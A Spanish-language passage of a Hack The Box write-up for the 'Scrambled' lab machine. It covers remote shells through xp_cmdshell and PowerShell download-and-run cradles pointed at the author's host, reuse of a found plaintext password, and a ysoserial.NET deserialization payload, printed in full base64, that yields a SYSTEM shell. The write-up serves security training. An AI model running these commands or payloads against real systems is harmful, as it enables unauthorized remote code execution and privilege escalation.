EXEC master.dbo.xp_cmdshell "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.207/shell.ps1')";

Tras ello logramos obtener acceso como sqlsvc.

1
2
3
4
5
6
7
8
9

 π ~/htb/scrambled ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.207] from scramblecorp.com [10.10.11.168] 57575
Windows PowerShell running as user sqlsvc on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
scrm\sqlsvc
PS C:\Windows\system32>

User - Miscsvc

En la raiz del disco encontramos la carpeta Shares, unicamente tenemos acceso a Public/ donde encontramos un PDF con información sobre un ataque reciente y la desactivación de autenticación por NTLM.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

PS C:\Shares> dir


    Directory: C:\Shares


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       01/11/2021     15:21                HR
d-----       03/11/2021     19:32                IT
d-----       01/11/2021     15:21                Production
d-----       04/11/2021     22:23                Public
d-----       03/11/2021     19:33                Sales


PS C:\Shares>

image

Shell

Similar a Arkham - HTB, utilizamos las credenciales que encontramos en la base de datos para ejecutar comandos como miscsvc. Observamos que tenemos acceso como miscsvc.

1
2
3
4
5
6
7

PS C:\users> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force;
PS C:\users> $Cred = New-Object System.Management.Automation.PSCredential('MiscSvc', $SecPassword);
PS C:\users> $session = New-PSSession -ComputerName DC1.SCRM.LOCAL -Credential $Cred;
PS C:\users> Invoke-Command -Session $session -ScriptBlock { whoami }
scrm\miscsvc
PS C:\users>
PS C:\users>

Ejecutamos una shell de nishang.

1

Invoke-Command -Session $session -ScriptBlock { powershell.exe -c "iex(new-object net.webclient).downloadstring('http://10.10.14.207/shell2.ps1')" }

Logrando obtener nuestra flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

 π ~/htb/scrambled ❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
connect to [10.10.14.207] from scramblecorp.com [10.10.11.168] 57607
Windows PowerShell running as user miscsvc on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\miscsvc\Documents> whoami
scrm\miscsvc
PS C:\Users\miscsvc\Documents> cd ../Desktop
PS C:\Users\miscsvc\Desktop> dir


    Directory: C:\Users\miscsvc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       15/07/2022     05:56             34 user.txt


PS C:\Users\miscsvc\Desktop> cat user.txt
53310aeb2461d48034d2169608926e2c
PS C:\Users\miscsvc\Desktop>

Privesc

Descubrimos una aplicación de escritorio en una de las carpetas de C:\Shares, seguramente es de la que se habla en el sitio web.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

PS C:\Shares\IT\Apps\Sales Order Client> dir


    Directory: C:\Shares\IT\Apps\Sales Order Client


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       05/11/2021     20:52          86528 ScrambleClient.exe
-a----       05/11/2021     20:52          19456 ScrambleLib.dll


PS C:\Shares\IT\Apps\Sales Order Client>

Tras obtener ambos archivos vemos que podrían estar escrito en .NET.

1
2
3
4
5

 π ~/htb/scrambled/app ❯ file ScrambleClient.exe
ScrambleClient.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
 π ~/htb/scrambled/app ❯ file ScrambleLib.dll
ScrambleLib.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
 π ~/htb/scrambled/app ❯

ScrambleClient

Instalamos ILSpy en una máquina windows para obtener el codigo fuente para analizarlo.

Abrimos el archivo ScrambleClient.exe observamos los diferentes componentes de este, no muestran algun tipo de interacción con el servidor o algun servicio, unicamente botones, labels inputs, etc., además hace uso de la libreria ScrambleLib.

image

ScrambleLib

Observamos las diferentes clases que la librería ofrece, una de ellas es Log.

image

En esta se muestra que realiza la escritura en el archivo ScrambleDebugLog.txt.

image

En SalesOrder encontramos funciones para Serializar y Deserializar en BinaryFormat en base64, lo que supondría una vulnerabilidad.

image

En ScrambleNetClient encontramos que es posible saltarse el login utilizando el usuario ‘scrmdev’.

image

Además de algunas funciones que permiten enviar y/o recibir datos.

image

ScrambledNetRequest y ScrambledNetResponse manejan las diferentes solicitudes. Finalmente ScrambleNetShared contiene constantes.

image

Scramble - App

Configuramos la dirección del servidor a la dirección IP de la máquina.

image

Utilizando como usario ‘scrmdev’ logramos ingresar, observamos una lista de ordenes.

image

Además podemos enviar una nueva orden.

image

Ejecutamos Wireshark para ver las solicitudes realizadas por la aplicación, observamos que al enviar una nueva orden realiza una conexión con el servidor en el puerto 4411, enviando la información serializada y codificada seguramente en base64 como se observa en el código.

image

Al decodificar observamos información sobre la clase u objeto SalesOrder.

image

Si realizamos una conexión con la máquina en el puerto 4411 observamos un error tras enviar información incorrecta, y que espera un string en base64 serializado.

1
2
3
4
5
6

 π ~/htb/scrambled ❯ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;abc
ERROR_GENERAL;Error deserializing sales order: Invalid length for a Base-64 char array or string.
QUIT
 π ~/htb/scrambled ❯

Ysoserial.NET

YSoSerial es una herramienta que contiene una libreria de gadgets que permiten explotar vulnerabilidades de deserialization en aplicaciones .NET. Observamos que tiene varios gadgets aunque no sabemos cual de ellos podría funcionar en la aplicación por lo que generamos un ‘payload’ con cada uno de ellos realizando un ping a nuestra máquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

[.. snip ..]

== GADGETS ==
        (*)  [Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*)  [This gadget ignores the command parameter and executes the constructor of ExploitClass class] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
        (*)  [Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , SoapFormatter
        (*)  (supports extra options: use the '--fullhelp' argument to view)
                Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
        (*)  [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*)  [This normally generates the shortest payload] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter , DataContractSerializer , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
        (*)  [Tweaked TypeConfuseDelegate gadget to work with Mono]
                Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
        (*)  [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)] (supports extra options: use the '--fullhelp' argument to view)
                Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializer (3) , SoapFormatter (2)
        (*) 
                Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
        (*) 
                Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter

Ping Test

Utilizamos la siguiente “sintaxis” para el envio del payload realizando una conexión por netcat, tal y como se observa en Wireshark.

1

UPLOAD_ORDER;<payload>

Tras intentar con diferentes gadgets obtuvimos pings desde la máquina con siete de ellos (pestaña 2).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

 π ~/htb/scrambled ❯ sudo tcpdump -i tun1 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun1, link-type RAW (Raw IP), snapshot length 262144 bytes
00:40:15.170285 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 1, length 40
00:40:15.170355 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 1, length 40
00:40:16.180870 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 2, length 40
00:40:16.180886 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 2, length 40
00:40:17.198144 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 3, length 40
00:40:17.198158 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 3, length 40
00:40:18.210003 IP dc1.scrm.local > 10.10.14.207: ICMP echo request, id 1, seq 4, length 40
00:40:18.210043 IP 10.10.14.207 > dc1.scrm.local: ICMP echo reply, id 1, seq 4, length 40

1
2
3
4
5
6
7
8
9

AxHostState
ClaimsIdentity
DataSet
RolePrincipal
SessionSecurityToken
SessionViewStateHistoryItem
TextFormattingRunProperties
TypeConfuseDelegate
WindowsIdentity

Shell

Con ello generamos un nuevo payload para ejecutar una shell Nishang.

1
2
3

PS C:\Users\skuld\Downloads\ysoserial-1.34\Release> ./ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.207/shell.ps1')"
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAOsDAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAjQY8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgcG93ZXJzaGVsbC5leGUgLWMgaWV4KG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWRzdHJpbmcoJ2h0dHA6Ly8xMC4xMC4xNC4yMDcvc2hlbGwucHMxJykiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cws=
PS C:\Users\skuld\Downloads\ysoserial-1.34\Release>

Tras enviar el payload obtuvimos una shell como administrador y nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

 π ~/htb/scrambled ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.207] from scramblecorp.com [10.10.11.168] 58472
Windows PowerShell running as user DC1$ on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd C:\users\administrator\desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       15/07/2022     05:56             34 root.txt


PS C:\users\administrator\desktop> cat root.txt
d4e301b8c323e25911c44ce30bcbe5b8
PS C:\users\administrator\desktop>
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: Scrambled